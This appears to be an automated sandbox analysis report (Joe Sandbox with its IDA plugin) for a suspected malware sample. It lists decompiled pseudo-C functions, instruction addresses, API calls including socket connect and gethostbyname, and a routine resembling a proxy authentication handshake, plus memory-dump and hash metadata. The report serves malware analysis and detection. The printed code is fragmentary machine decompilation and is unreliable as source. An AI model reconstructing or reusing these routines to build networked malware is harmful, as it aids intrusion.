                                                                            • Part of subcall function 0040619A: inet_addr.WS2_32 ref: 0040630B
                                                                            • Part of subcall function 0040619A: gethostbyname.WS2_32 ref: 00406321
                                                                            • Part of subcall function 0040619A: connect.WS2_32 ref: 0040634D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Free$AllocateGlobalQuery_SystemTimeconnectgethostbynamehtonsinet_addrlstrcpymallocmemsetsocketstrchrwsprintf
                                                                          • String ID: @$j_@
                                                                          • API String ID: 3179556216-3208567232
                                                                          • Opcode ID: 9019b2dfd91c923306931ebe787b21ef8ab25a52cd19833d7762eabd49a2fa17
                                                                          • Instruction ID: 173fe34617f367652bf3f1e9fca4c53672752cc9009160b2f8c90af088e1383c
                                                                          • Opcode Fuzzy Hash: 9019b2dfd91c923306931ebe787b21ef8ab25a52cd19833d7762eabd49a2fa17
                                                                          • Instruction Fuzzy Hash: 7551B4B4904709DFCB10DFA5C48468EBBF1FF88314F14862AE868A7395D3389846CF95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastValue
                                                                          • String ID:
                                                                          • API String ID: 1151882462-0
                                                                          • Opcode ID: 49d06252631d2c5c8c2d25fde44a13d536e716d3c70b2a77a029649fafb08e20
                                                                          • Instruction ID: 444a06ef6d56dde007bbc20e4d8b26003c34dd805877e33333d77d24524e80d9
                                                                          • Opcode Fuzzy Hash: 49d06252631d2c5c8c2d25fde44a13d536e716d3c70b2a77a029649fafb08e20
                                                                          • Instruction Fuzzy Hash: 88513A70E003088FDB10EFA9DA8469EBBF4BB04304F14853AD845B7390DB78A955CF9A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 50%
                                                                          			E0040BB20(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                          				void* _v12;
                                                                          				void* _v16;
                                                                          				void* _v20;
                                                                          				void* _v24;
                                                                          				void* _v28;
                                                                          				void* _v40;
                                                                          				intOrPtr _v52;
                                                                          				long _v56;
                                                                          				void* _v60;
                                                                          				intOrPtr _v84;
                                                                          				intOrPtr _v96;
                                                                          				void* _t54;
                                                                          				long _t56;
                                                                          				void* _t57;
                                                                          				void* _t58;
                                                                          				void* _t60;
                                                                          				void* _t62;
                                                                          				long _t65;
                                                                          				void* _t66;
                                                                          				void* _t67;
                                                                          				intOrPtr* _t70;
                                                                          				void* _t72;
                                                                          				void* _t78;
                                                                          				void* _t82;
                                                                          				void* _t88;
                                                                          				void* _t94;
                                                                          				intOrPtr _t101;
                                                                          				long _t113;
                                                                          				intOrPtr _t116;
                                                                          				intOrPtr _t117;
                                                                          				void* _t119;
                                                                          				intOrPtr* _t120;
                                                                          				long* _t121;
                                                                          				void** _t122;
                                                                          				long* _t123;
                                                                          				intOrPtr* _t124;
                                                                          
                                                                          				_t87 = __ebx;
                                                                          				_push(__ebx);
                                                                          				_t120 = _t119 - 0x1c;
                                                                          				_t54 =  *0x418284;
                                                                          				_t109 = _a4;
                                                                          				if(_t54 == 0) {
                                                                          					E0040B0E0(_t54);
                                                                          					_t54 =  *0x418284;
                                                                          					_t113 =  *(_t54 + 0x30);
                                                                          					if(_t113 >= 0) {
                                                                          						goto L2;
                                                                          					} else {
                                                                          						goto L15;
                                                                          					}
                                                                          					goto L47;
                                                                          				} else {
                                                                          					_t113 =  *(_t54 + 0x30);
                                                                          					if(_t113 < 0) {
                                                                          						L15:
                                                                          						E0040B3B0(_t87, _t113);
                                                                          						_t54 =  *0x418284;
                                                                          						_t88 =  *(_t54 + 0x30);
                                                                          						if(_t88 == 0) {
                                                                          							goto L3;
                                                                          						} else {
                                                                          							goto L17;
                                                                          						}
                                                                          						L47:
                                                                          					} else {
                                                                          						L2:
                                                                          						_t88 =  *(_t54 + 0x30);
                                                                          						if(_t88 != 0) {
                                                                          							L17:
                                                                          							_t56 = GetLastError();
                                                                          							 *_t120 =  *((intOrPtr*)(_t54 + 0x2c));
                                                                          							_t113 = _t56;
                                                                          							_t57 = TlsGetValue(??);
                                                                          							_t121 = _t120 - 4;
                                                                          							_t88 = _t57;
                                                                          							 *_t121 = _t113;
                                                                          							SetLastError(??);
                                                                          							_t58 = _t88;
                                                                          							_t120 = _t121 - 4;
                                                                          						} else {
                                                                          							L3:
                                                                          							_t58 =  *(_t54 + 0x28);
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				_v20 = _t58;
                                                                          				_v24 = _t58;
                                                                          				if( *((intOrPtr*)(_t109 + 0xc)) != 0) {
                                                                          					_t60 = E0040B8D0(_t109,  &_v24);
                                                                          				} else {
                                                                          					_t60 = E0040B6B0(_t109,  &_v24);
                                                                          				}
                                                                          				if(_t60 == 7) {
                                                                          					_t78 =  *0x418284;
                                                                          					_t88 = _v24;
                                                                          					if(_t78 == 0) {
                                                                          						E0040B0E0(_t78);
                                                                          						_t78 =  *0x418284;
                                                                          						if( *((intOrPtr*)(_t78 + 0x30)) >= 0) {
                                                                          							L9:
                                                                          							_t109 =  *((intOrPtr*)(_t78 + 0x30));
                                                                          							if( *((intOrPtr*)(_t78 + 0x30)) != 0) {
                                                                          								_v40 = _t88;
                                                                          								 *_t120 =  *((intOrPtr*)(_t78 + 0x2c));
                                                                          								if(TlsSetValue(??, ??) == 0) {
                                                                          									GetLastError();
                                                                          								}
                                                                          							} else {
                                                                          								 *(_t78 + 0x28) = _t88;
                                                                          							}
                                                                          							_t82 = _v24;
                                                                          							_t116 =  *((intOrPtr*)(_t82 + 0x20));
                                                                          							_t120 =  *((intOrPtr*)(_t82 + 0x28));
                                                                          							goto __ecx;
                                                                          						}
                                                                          						L22:
                                                                          						E0040B3B0(_t88, _t113);
                                                                          						_t78 =  *0x418284;
                                                                          						goto L9;
                                                                          					}
                                                                          					if( *((intOrPtr*)(_t78 + 0x30)) < 0) {
                                                                          						goto L22;
                                                                          					}
                                                                          					goto L9;
                                                                          				}
                                                                          				abort();
                                                                          				_push(_t116);
                                                                          				_t117 = _t120;
                                                                          				_t122 = _t120 - 0x28;
                                                                          				_v52 = _t109;
                                                                          				_t110 = _v40;
                                                                          				_v60 = _t88;
                                                                          				_v56 = _t113;
                                                                          				_t114 =  *(_t110 + 0xc);
                                                                          				if( *(_t110 + 0xc) == 0) {
                                                                          					 *_t122 = _t110;
                                                                          					return E0040B740();
                                                                          				} else {
                                                                          					_t62 =  *0x418284;
                                                                          					if(_t62 == 0) {
                                                                          						E0040B0E0(_t62);
                                                                          						_t62 =  *0x418284;
                                                                          					}
                                                                          					_t91 =  *((intOrPtr*)(_t62 + 0x30));
                                                                          					if( *((intOrPtr*)(_t62 + 0x30)) < 0) {
                                                                          						E0040B3B0(_t91, _t114);
                                                                          						_t62 =  *0x418284;
                                                                          					}
                                                                          					if( *((intOrPtr*)(_t62 + 0x30)) != 0) {
                                                                          						_t65 = GetLastError();
                                                                          						 *_t122 =  *(_t62 + 0x2c);
                                                                          						_t114 = _t65;
                                                                          						_t66 = TlsGetValue(??);
                                                                          						_t123 = _t122 - 4;
                                                                          						 *_t123 = _t65;
                                                                          						SetLastError(??);
                                                                          						_t67 = _t66;
                                                                          						_t122 = _t123 - 4;
                                                                          					} else {
                                                                          						_t67 =  *(_t62 + 0x28);
                                                                          					}
                                                                          					_v24 = _t67;
                                                                          					_v28 = _t67;
                                                                          					if(E0040B8D0(_t110,  &_v28) == 7) {
                                                                          						_t72 =  *0x418284;
                                                                          						_t94 = _v28;
                                                                          						if(_t72 == 0) {
                                                                          							E0040B0E0(_t72);
                                                                          							_t72 =  *0x418284;
                                                                          						}
                                                                          						if( *(_t72 + 0x30) < 0) {
                                                                          							E0040B3B0(_t94, _t114);
                                                                          							_t72 =  *0x418284;
                                                                          						}
                                                                          						_t110 =  *(_t72 + 0x30);
                                                                          						if( *(_t72 + 0x30) != 0) {
                                                                          							_v84 = _t94;
                                                                          							 *_t122 =  *(_t72 + 0x2c);
                                                                          							if(TlsSetValue(??, ??) == 0) {
                                                                          								GetLastError();
                                                                          							}
                                                                          						} else {
                                                                          							 *((intOrPtr*)(_t72 + 0x28)) = _t94;
                                                                          						}
                                                                          						_t62 = _v28;
                                                                          						_t117 =  *((intOrPtr*)(_t62 + 0x20));
                                                                          						_t122 =  *(_t62 + 0x28);
                                                                          						goto __ecx;
                                                                          					}
                                                                          					abort();
                                                                          					_push(_t117);
                                                                          					_t124 = _t122 - 8;
                                                                          					_t101 = _v84;
                                                                          					_t70 =  *((intOrPtr*)(_t101 + 8));
                                                                          					if(_t70 != 0) {
                                                                          						_v96 = _t101;
                                                                          						 *_t124 = 1;
                                                                          						return  *_t70();
                                                                          					} else {
                                                                          						return _t70;
                                                                          					}
                                                                          				}
                                                                          				goto L47;
                                                                          			}







































                                                                          0x0040bb20
                                                                          0x0040bb25
                                                                          0x0040bb26
                                                                          0x0040bb29
                                                                          0x0040bb2e
                                                                          0x0040bb33
                                                                          0x0040bbb4
                                                                          0x0040bbb9
                                                                          0x0040bbbe
                                                                          0x0040bbc3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040bb35
                                                                          0x0040bb35
                                                                          0x0040bb3a
                                                                          0x0040bbd0
                                                                          0x0040bbd0
                                                                          0x0040bbd5
                                                                          0x0040bbda
                                                                          0x0040bbdf
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040bb40
                                                                          0x0040bb40
                                                                          0x0040bb40
                                                                          0x0040bb45
                                                                          0x0040bbf0
                                                                          0x0040bbf3
                                                                          0x0040bbf9
                                                                          0x0040bbfc
                                                                          0x0040bbfe
                                                                          0x0040bc04
                                                                          0x0040bc07
                                                                          0x0040bc09
                                                                          0x0040bc0c
                                                                          0x0040bc12
                                                                          0x0040bc14
                                                                          0x0040bb4b
                                                                          0x0040bb4b
                                                                          0x0040bb4b
                                                                          0x0040bb4b
                                                                          0x0040bb45
                                                                          0x0040bb3a
                                                                          0x0040bb4e
                                                                          0x0040bb54
                                                                          0x0040bb59
                                                                          0x0040bbad
                                                                          0x0040bb5b
                                                                          0x0040bb60
                                                                          0x0040bb60
                                                                          0x0040bb68
                                                                          0x0040bb6e
                                                                          0x0040bb73
                                                                          0x0040bb78
                                                                          0x0040bc46
                                                                          0x0040bc4b
                                                                          0x0040bc55
                                                                          0x0040bb89
                                                                          0x0040bb89
                                                                          0x0040bb8e
                                                                          0x0040bc23
                                                                          0x0040bc27
                                                                          0x0040bc35
                                                                          0x0040bc3b
                                                                          0x0040bc3b
                                                                          0x0040bb94
                                                                          0x0040bb94
                                                                          0x0040bb94
                                                                          0x0040bb97
                                                                          0x0040bba0
                                                                          0x0040bba3
                                                                          0x0040bba6
                                                                          0x0040bba6
                                                                          0x0040bc60
                                                                          0x0040bc60
                                                                          0x0040bc65
                                                                          0x00000000
                                                                          0x0040bc65
                                                                          0x0040bb83
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040bb83
                                                                          0x0040bc6f
                                                                          0x0040bc80
                                                                          0x0040bc81
                                                                          0x0040bc83
                                                                          0x0040bc86
                                                                          0x0040bc89
                                                                          0x0040bc8c
                                                                          0x0040bc8f
                                                                          0x0040bc92
                                                                          0x0040bc97
                                                                          0x0040bd12
                                                                          0x0040bd26
                                                                          0x0040bc99
                                                                          0x0040bc99
                                                                          0x0040bca0
                                                                          0x0040bd06
                                                                          0x0040bd0b
                                                                          0x0040bd0b
                                                                          0x0040bca2
                                                                          0x0040bca7
                                                                          0x0040bd81
                                                                          0x0040bd86
                                                                          0x0040bd86
                                                                          0x0040bcb2
                                                                          0x0040bd2a
                                                                          0x0040bd30
                                                                          0x0040bd33
                                                                          0x0040bd35
                                                                          0x0040bd3b
                                                                          0x0040bd40
                                                                          0x0040bd43
                                                                          0x0040bd49
                                                                          0x0040bd4b
                                                                          0x0040bcb4
                                                                          0x0040bcb4
                                                                          0x0040bcb4
                                                                          0x0040bcb7
                                                                          0x0040bcbd
                                                                          0x0040bcca
                                                                          0x0040bcd0
                                                                          0x0040bcd5
                                                                          0x0040bcda
                                                                          0x0040bd72
                                                                          0x0040bd77
                                                                          0x0040bd77
                                                                          0x0040bce5
                                                                          0x0040bd90
                                                                          0x0040bd95
                                                                          0x0040bd95
                                                                          0x0040bceb
                                                                          0x0040bcf0
                                                                          0x0040bd56
                                                                          0x0040bd5a
                                                                          0x0040bd68
                                                                          0x0040bd6a
                                                                          0x0040bd6a
                                                                          0x0040bcf2
                                                                          0x0040bcf2
                                                                          0x0040bcf2
                                                                          0x0040bcf5
                                                                          0x0040bcfe
                                                                          0x0040bd01
                                                                          0x0040bd04
                                                                          0x0040bd04
                                                                          0x0040bd9f
                                                                          0x0040bdb0
                                                                          0x0040bdb3
                                                                          0x0040bdb6
                                                                          0x0040bdb9
                                                                          0x0040bdbe
                                                                          0x0040bdc2
                                                                          0x0040bdc6
                                                                          0x0040bdd0
                                                                          0x0040bdc1
                                                                          0x0040bdc1
                                                                          0x0040bdc1
                                                                          0x0040bdbe
                                                                          0x00000000

                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,?,?,00000000,0040A5E0,?,0040915F), ref: 0040BBF3
                                                                          • TlsGetValue.KERNEL32(?,?,?,00000000,0040A5E0,?,0040915F), ref: 0040BBFE
                                                                          • SetLastError.KERNEL32(?,?,?,?,00000000,0040A5E0,?,0040915F), ref: 0040BC0C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$Value
                                                                          • String ID:
                                                                          • API String ID: 1883355122-0
                                                                          • Opcode ID: fa13b5d1df785b275ee1be112967064b6d69b0b989222e142ff9d8512929a6cc
                                                                          • Instruction ID: 70379029d47ec5d74f210fe91046701c6fe62c7a006fd99b0e016d118132c0f1
                                                                          • Opcode Fuzzy Hash: fa13b5d1df785b275ee1be112967064b6d69b0b989222e142ff9d8512929a6cc
                                                                          • Instruction Fuzzy Hash: A1315B70A0061A8FCB50EF65CA84A5ABBB4FB44300B0585BED904AB796DB34FD05CBDD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 57%
                                                                          			E00401000(intOrPtr __ebx, intOrPtr __esi, intOrPtr* _a4) {
                                                                          				intOrPtr _v8;
                                                                          				intOrPtr _v12;
                                                                          				intOrPtr* _v24;
                                                                          				intOrPtr* _t16;
                                                                          				intOrPtr* _t27;
                                                                          				intOrPtr* _t33;
                                                                          				intOrPtr* _t37;
                                                                          
                                                                          				_v12 = __ebx;
                                                                          				_t27 = 0;
                                                                          				_v8 = __esi;
                                                                          				_t33 = 0;
                                                                          				_t16 =  *((intOrPtr*)( *_a4));
                                                                          				if(_t16 > 0xc0000091) {
                                                                          					__eflags = _t16 - 0xc0000094;
                                                                          					if(__eflags == 0) {
                                                                          						goto L3;
                                                                          					} else {
                                                                          						if(__eflags > 0) {
                                                                          							__eflags = _t16 - 0xc0000096;
                                                                          							goto L14;
                                                                          						} else {
                                                                          							__eflags = _t16 - 0xc0000093;
                                                                          							if(_t16 == 0xc0000093) {
                                                                          								goto L2;
                                                                          							} else {
                                                                          								return 0;
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					if(_t16 < 0xc000008d) {
                                                                          						__eflags = _t16 - 0xc0000005;
                                                                          						if(_t16 == 0xc0000005) {
                                                                          							 *_t37 = 0xb;
                                                                          							_v24 = 0;
                                                                          							L0040C198();
                                                                          							__eflags = 0 - 1;
                                                                          							if(0 == 1) {
                                                                          								 *_t37 = 0xb;
                                                                          								_v24 = 1;
                                                                          								L0040C198();
                                                                          								goto L6;
                                                                          							} else {
                                                                          								__eflags = 0;
                                                                          								if(0 != 0) {
                                                                          									 *_t37 = 0xb;
                                                                          									 *0x00000000();
                                                                          									goto L6;
                                                                          								}
                                                                          							}
                                                                          						} else {
                                                                          							__eflags = _t16 - 0xc000001d;
                                                                          							L14:
                                                                          							if(__eflags == 0) {
                                                                          								 *_t37 = 4;
                                                                          								_v24 = 0;
                                                                          								L0040C198();
                                                                          								__eflags = _t16 - 1;
                                                                          								if(_t16 == 1) {
                                                                          									 *_t37 = 4;
                                                                          									_v24 = 1;
                                                                          									L0040C198();
                                                                          									goto L6;
                                                                          								} else {
                                                                          									__eflags = _t16;
                                                                          									if(_t16 != 0) {
                                                                          										 *_t37 = 4;
                                                                          										 *_t16();
                                                                          										goto L6;
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          					} else {
                                                                          						L2:
                                                                          						_t33 = 1;
                                                                          						L3:
                                                                          						 *_t37 = 8;
                                                                          						_v24 = 0;
                                                                          						L0040C198();
                                                                          						if(_t16 == 1) {
                                                                          							 *_t37 = 8;
                                                                          							_v24 = 1;
                                                                          							L0040C198();
                                                                          							__eflags = _t33;
                                                                          							if(_t33 != 0) {
                                                                          								E0040B000(1);
                                                                          							}
                                                                          							goto L6;
                                                                          						} else {
                                                                          							if(_t16 != 0) {
                                                                          								 *_t37 = 8;
                                                                          								 *_t16();
                                                                          								L6:
                                                                          								_t27 = 0xffffffff;
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          					return _t27;
                                                                          				}
                                                                          			}










                                                                          0x00401006
                                                                          0x0040100c
                                                                          0x0040100e
                                                                          0x00401013
                                                                          0x00401015
                                                                          0x0040101c
                                                                          0x00401061
                                                                          0x00401066
                                                                          0x00000000
                                                                          0x00401068
                                                                          0x00401068
                                                                          0x004010b4
                                                                          0x00000000
                                                                          0x0040106a
                                                                          0x0040106a
                                                                          0x0040106f
                                                                          0x00000000
                                                                          0x00401071
                                                                          0x0040107c
                                                                          0x0040107c
                                                                          0x0040106f
                                                                          0x00401068
                                                                          0x0040101e
                                                                          0x00401023
                                                                          0x00401080
                                                                          0x00401085
                                                                          0x004010e2
                                                                          0x004010eb
                                                                          0x004010ef
                                                                          0x004010f4
                                                                          0x004010f7
                                                                          0x00401129
                                                                          0x00401135
                                                                          0x00401139
                                                                          0x00000000
                                                                          0x004010f9
                                                                          0x004010f9
                                                                          0x004010fb
                                                                          0x00401101
                                                                          0x00401108
                                                                          0x00000000
                                                                          0x00401108
                                                                          0x004010fb
                                                                          0x00401087
                                                                          0x00401087
                                                                          0x0040108c
                                                                          0x0040108c
                                                                          0x0040108e
                                                                          0x00401097
                                                                          0x0040109b
                                                                          0x004010a0
                                                                          0x004010a3
                                                                          0x0040110f
                                                                          0x0040111b
                                                                          0x0040111f
                                                                          0x00000000
                                                                          0x004010a5
                                                                          0x004010a5
                                                                          0x004010a7
                                                                          0x004010a9
                                                                          0x004010b0
                                                                          0x00000000
                                                                          0x004010b0
                                                                          0x004010a7
                                                                          0x004010a3
                                                                          0x0040108c
                                                                          0x00401025
                                                                          0x00401025
                                                                          0x00401025
                                                                          0x0040102a
                                                                          0x0040102a
                                                                          0x00401033
                                                                          0x00401037
                                                                          0x0040103f
                                                                          0x004010bb
                                                                          0x004010c7
                                                                          0x004010cb
                                                                          0x004010d0
                                                                          0x004010d2
                                                                          0x004010d8
                                                                          0x004010d8
                                                                          0x00000000
                                                                          0x00401041
                                                                          0x00401043
                                                                          0x00401045
                                                                          0x0040104c
                                                                          0x0040104e
                                                                          0x0040104e
                                                                          0x0040104e
                                                                          0x00401043
                                                                          0x0040103f
                                                                          0x0040105e
                                                                          0x0040105e

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: signal
                                                                          • String ID:
                                                                          • API String ID: 1946981877-0
                                                                          • Opcode ID: 9dd3622f94295c007e8091df12e6935fb1746a3fe3b08565decb20ecfd99f9c6
                                                                          • Instruction ID: 6d904beb62735350cc8560cdbfd164d6d9336f8a3c982fff81a65fa89f770588
                                                                          • Opcode Fuzzy Hash: 9dd3622f94295c007e8091df12e6935fb1746a3fe3b08565decb20ecfd99f9c6
                                                                          • Instruction Fuzzy Hash: BC3125709042449BE720AF69C58032EB6E0BB49314F15893FD9C5EB7E2C67E8DC09B4A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 76%
                                                                          			E10001A5B(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, short* _a8) {
                                                                          				intOrPtr _v8;
                                                                          				intOrPtr _v12;
                                                                          				intOrPtr _v16;
                                                                          				char _v284;
                                                                          				signed int _v285;
                                                                          				signed int _v286;
                                                                          				void* _v308;
                                                                          				signed int _v312;
                                                                          				char _v316;
                                                                          				short* _v320;
                                                                          				void* _t45;
                                                                          				signed int _t46;
                                                                          				void* _t53;
                                                                          				signed int _t55;
                                                                          				void* _t58;
                                                                          				signed int _t60;
                                                                          				signed int _t64;
                                                                          				signed int _t70;
                                                                          				signed int _t71;
                                                                          				intOrPtr _t74;
                                                                          				short* _t77;
                                                                          				void* _t79;
                                                                          				intOrPtr* _t80;
                                                                          
                                                                          				_v16 = __ebx;
                                                                          				_v12 = __esi;
                                                                          				_v8 = __edi;
                                                                          				_t74 = _a4;
                                                                          				_t77 = _a8;
                                                                          				_v286 = 0xff;
                                                                          				_t46 = E1000128D(_t45, _t74, _t77, 2);
                                                                          				_t71 = 0;
                                                                          				if(_t46 != 0) {
                                                                          					_t70 =  *(_t77 + 1) & 0x000000ff;
                                                                          					_t71 = 0;
                                                                          					if(((_t46 & 0xffffff00 |  *_t77 != 0x00000001 | 0 | _t70 == 0x00000000) & 0x00000001) == 0) {
                                                                          						_t53 = E1000128D( &_v284, _t74,  &_v284, _t70 + 1);
                                                                          						_t71 = 0;
                                                                          						if(_t53 != 0) {
                                                                          							_t55 =  *(_t70 +  &_v284) & 0x000000ff;
                                                                          							_v285 = _t55;
                                                                          							_t71 = 0;
                                                                          							if(_t55 != 0) {
                                                                          								 *(_t70 +  &_v284) = 0;
                                                                          								_t58 = E1000128D(_v285, _t74, _t77, _v285);
                                                                          								_t71 = 0;
                                                                          								if(_t58 != 0) {
                                                                          									 *((char*)(_t77 + _v285)) = 0;
                                                                          									_t60 =  &_v284;
                                                                          									_v312 = _t60;
                                                                          									_v316 = 0x10006054;
                                                                          									L10003560();
                                                                          									_t80 = _t79 - 8;
                                                                          									if(_t60 == 0) {
                                                                          										_v320 = _t77;
                                                                          										 *_t80 = 0x100060c4;
                                                                          										L10003560();
                                                                          										_t80 = _t80 - 8;
                                                                          										_v286 = _v286 &  ~(_t60 & 0xffffff00 | _t60 != 0x00000000);
                                                                          									}
                                                                          									 *_t77 = _v286 << 0x00000008 | 0x00000001;
                                                                          									_v316 = 2;
                                                                          									_v320 = _t77;
                                                                          									 *_t80 = _t74;
                                                                          									_t64 = E10001236(_v286 << 0x00000008 | 0x00000001);
                                                                          									_t71 = 0;
                                                                          									if(_t64 != 0) {
                                                                          										_t71 = (_t64 & 0xffffff00 | _v286 == 0x00000000) & 0x000000ff;
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				return _t71;
                                                                          			}


























                                                                          0x10001a64
                                                                          0x10001a67
                                                                          0x10001a6a
                                                                          0x10001a6d
                                                                          0x10001a70
                                                                          0x10001a73
                                                                          0x10001a89
                                                                          0x10001a8e
                                                                          0x10001a95
                                                                          0x10001a9b
                                                                          0x10001aac
                                                                          0x10001ab3
                                                                          0x10001ace
                                                                          0x10001ad3
                                                                          0x10001ada
                                                                          0x10001ae3
                                                                          0x10001aeb
